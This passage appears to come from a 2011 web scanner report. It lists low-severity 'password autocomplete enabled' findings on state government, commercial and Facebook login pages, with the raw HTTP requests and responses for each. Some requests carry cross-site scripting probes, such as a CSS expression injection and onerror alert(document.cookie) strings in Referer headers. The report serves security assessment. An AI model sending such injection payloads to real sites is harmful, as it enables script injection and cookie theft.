...[SNIP]...
<body>
       <form name="TheForm" method="post" action="Login.aspx" id="TheForm">
<input type="hidden" name="JSEnabled" value="false" />
...[SNIP]...
<td rowspan="1" colspan="1"><input name="Password" type="password" id="Password" /></td>
...[SNIP]...

15.12. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://olt.custhelp.com
Path:   /cgi-bin/olt.cfg/php/enduser/acct_login.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /cgi-bin/olt.cfg/php/enduser/acct_login.php?OLTSite=%22%20stYle=x:expre/**/ssion(netsparker(9))%20ns=%22%20&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_next_page=acct_login.php HTTP/1.1
Host: olt.custhelp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=162278755.1304039398.1.1.utmcsr=qriocity.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/en/; __utma=162278755.897277051.1304039398.1304039398.1304039398.1

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 21:19:11 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: rnw_enduser_login_start=LOGIN_START; expires=Fri, 29-Apr-2011 21:39:11 GMT
RNT-Time: D=82489 t=1304111951723725
RNT-Machine: 01
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11770

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en_US">
<!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- -->
...[SNIP]...
</tr>
<form class="minimal" name="_validate" method="post" action="acct_login_submit.php">
<input type="hidden" name="OLTSite" value="&quot; stYle=x:expre/**/ssion(netsparker(9)) ns=&quot; " />
...[SNIP]...
<td><input name="p_passwd" id="p_passwd" type="password" size="20" maxlength="20" /></td>
...[SNIP]...

15.13. https://onestop.michigan.gov/OneStop/a  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /OneStop/a

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /OneStop/a HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/OneStop/ssoNeedPassword.do4c601--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E687572642ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AMWEBJCT!%2Fonestop-main!JSESSIONID=00019ZIYB-FVRKrzIwI-8cI81wk:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:27:42 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache
Set-Cookie: PD-S-SESSION-ID-M=2_0_kUmUzvWxa29ffb+KB9WrHnipWl6pPoxQj6N-OyOoeWRBIG+E; Path=/; Secure

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...
<div id="wrapper">
               <form method="post" action="/pkmslogin.form" onSubmit="return fnSubmit();">
                <div id="banner">
...[SNIP]...
</label>
                                   <input class="input" type="password" name="password" size="15">
                               </p>
...[SNIP]...

15.14. https://onestop.michigan.gov/css/none  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /css/none

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /css/none HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:41 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...
<div id="wrapper">
               <form method="post" action="/pkmslogin.form" onSubmit="return fnSubmit();">
                <div id="banner">
...[SNIP]...
</label>
                                   <input class="input" type="password" name="password" size="15">
                               </p>
...[SNIP]...

15.15. https://onestop.michigan.gov/images/imgBanBG.gif  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /images/imgBanBG.gif

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /images/imgBanBG.gif HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:41 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...
<div id="wrapper">
               <form method="post" action="/pkmslogin.form" onSubmit="return fnSubmit();">
                <div id="banner">
...[SNIP]...
</label>
                                   <input class="input" type="password" name="password" size="15">
                               </p>
...[SNIP]...

15.16. https://onestop.michigan.gov/onestop-main/OneStop/a  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/a

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /onestop-main/OneStop/a HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:28:15 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...
<div id="wrapper">
               <form method="post" action="/pkmslogin.form" onSubmit="return fnSubmit();">
                <div id="banner">
...[SNIP]...
</label>
                                   <input class="input" type="password" name="password" size="15">
                               </p>
...[SNIP]...

15.17. https://onestop.michigan.gov/onestop-main/OneStop/obDesiredBiz.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://onestop.michigan.gov
Path:   /onestop-main/OneStop/obDesiredBiz.do

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /onestop-main/OneStop/obDesiredBiz.do?dispatchCommand=preprocess HTTP/1.1
Host: onestop.michigan.gov
Connection: keep-alive
Referer: https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do157a1--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ed3792cda3df
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PD-S-SESSION-ID-M=2_0_K6WGDkiKA3PMVW10ldzkXmbuPYJIXsdlsERHrZd63x0IV9Ed; IV_JCT=%2Fonestop-main; AMWEBJCT!%2Fonestop-main!JSESSIONID=0001uBkti1276B3IGohGJh7atYM:-D00MP

Response

HTTP/1.1 200 OK
content-length: 7389
content-type: text/html
date: Sat, 30 Apr 2011 12:29:19 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: WebSEAL/6.1.1.1 (Build 110202)
cache-control: no-cache
pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html >
<head>
   <title>Michigan Business One Stop- Login</title>
   <link rel="stylesheet" type="text/css" href
...[SNIP]...
<div id="wrapper">
               <form method="post" action="/pkmslogin.form" onSubmit="return fnSubmit();">
                <div id="banner">
...[SNIP]...
</label>
                                   <input class="input" type="password" name="password" size="15">
                               </p>
...[SNIP]...

15.18. http://pa.gov/portal/server.pt  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pa.gov
Path:   /portal/server.pt

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

POST /portal/server.pt? HTTP/1.1
Host: pa.gov
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/gateway%2527/PTARGS_0_2_24662_2966_368351_43/http
Cache-Control: max-age=0
Origin: http://pa.gov
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: plloginoccured=false; REQUESTURLBEFORESSO=; ptLastLoginAuthSource=
Content-Length: 128

in_hi_space=Login&in_hi_spaceID=82&in_hi_control=Login&in_hi_dologin=true&in_tx_username=&in_pw_userpass=&in_se_authsource=cwopa

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Language: en
Set-Cookie: ASP.NET_SessionId=uc2nxa33mmh2xs55wfhh52by; path=/
Expires: 1304080785543
Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0
Last-Modified: 1304167185543
Content-Type: text/html; charset=utf-8
Content-Length: 34484

<html>

<head><link type="text/css" href="http://www.portal.state.pa.us/imageserver/plumtree/common/public/css/mainstyle19-en.css" rel="StyleSheet" lang="en"></link><title>Log In</title><script type="
...[SNIP]...
</table>
<form method="post" action="http://pa.gov/portal/server.pt?" name="lform" id="loginFormID"><table align="center" cellpadding="2" cellspacing="0" width="400">
...[SNIP]...
<td align="left" width="60%" colspan="1" class="loginText"><input type="password" alt="Password:" size="30" class="formInputBoxText" name="in_pw_userpass" id="pt-login-password-field" onkeypress="return executeViaEnter(event);" value=""></input>
...[SNIP]...

15.19. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 30 Apr 2011 12:24:49 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=B1981083223B49AAF8B9D753FAD991EB|portal20.sa.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcx9UjpVfeUFx19Ud%252FeRI7S2%252FxpJgtc3zKY%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...
<tr>
   <form name="frm2" action="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/blank"
    onSubmit="defaultSubmit(); return false;" method="post">
   <!-- change D 2008/11/24 -->
...[SNIP]...
<td class="loginText">
    <input type="password" name="IDToken2"
id="IDToken2"
       value="" size="20">

   </td>
...[SNIP]...

15.20. http://www.alabama.gov/portal/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /portal/index.jsp HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://al.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:36:24 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcI5QvmCkxSLfmPB1J_s; path=/
Content-Type: text/html
Content-Length: 34756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equ
...[SNIP]...
<noscript><form action='http://www.alabama.gov/portal_alerts/login_portal.action' method='get' target="_blank"></noscript>
...[SNIP]...
<p>
   password:<input type="password" name="login_password" id="login_password" value="" />
</p>
...[SNIP]...

15.21. https://www.compasssmartshopper.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.compasssmartshopper.com
Path:   /default.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /default.aspx HTTP/1.1
Host: www.compasssmartshopper.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:38:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Compass Smar
...[SNIP]...
onload="MM_preloadImages('/images/nav/nav1_over.jpg','/images/nav/nav2_over.jpg','/images/nav/nav3_over.jpg','/images/nav/nav4_over.jpg','/images/nav/nav5_over.jpg','/images/nav/nav6_over.jpg')">
<form name="aspnetForm" method="post" action="default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td height="50" align="center" valign="top">
<input name="ctl00$MiddleRow$LoginHandler1$Login1$Password" type="password" id="ctl00_MiddleRow_LoginHandler1_Login1_Password" class="loginpassword" /><span id="ctl00_MiddleRow_LoginHandler1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

15.22. https://www.ehawaii.gov/efile/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ehawaii.gov
Path:   /efile/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /efile/ HTTP/1.1
Host: www.ehawaii.gov
Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=180588659.1320072404.1304201425.1304201425.1304201425.1; __utmb=180588659; __utmc=180588659; __utmz=180588659.1304201425.1.1.utmccn=(referral)|utmcsr=hawaii.gov|utmcct=/|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:16 GMT
Server: Apache
Content-Type: text/html
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 8712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv=
...[SNIP]...
</span>
    <form method = "post" action = "https://dotax.ehawaii.gov/efile/user ">
    <input name="SESSION_ID" type=hidden value="">
...[SNIP]...
<label><input type="password" name="PASSWORD" value="" size="14" maxlength="12" title="Password, case sensitive" class="mediumField"></label>
...[SNIP]...

15.23. http://www.facebook.com/TeamHaslam  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /TeamHaslam

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /TeamHaslam HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=Pi-Op; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.9.128
Connection: close
Date: Sat, 30 Apr 2011 12:32:13 GMT
Content-Length: 135590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.24. http://www.facebook.com/WSDOL  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /WSDOL

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /WSDOL HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=IdulS; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.231.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:14 GMT
Content-Length: 165238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.25. http://www.facebook.com/note.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /note.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /note.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=DNT-Q; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.234.113
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 13344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.26. http://www.facebook.com/ohiodivisionofwatercraft  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ohiodivisionofwatercraft

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ohiodivisionofwatercraft HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=-xzbm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:07 GMT
Content-Length: 45188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.27. http://www.facebook.com/photo.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /photo.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /photo.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=9bvPF; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.206.101
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 11367

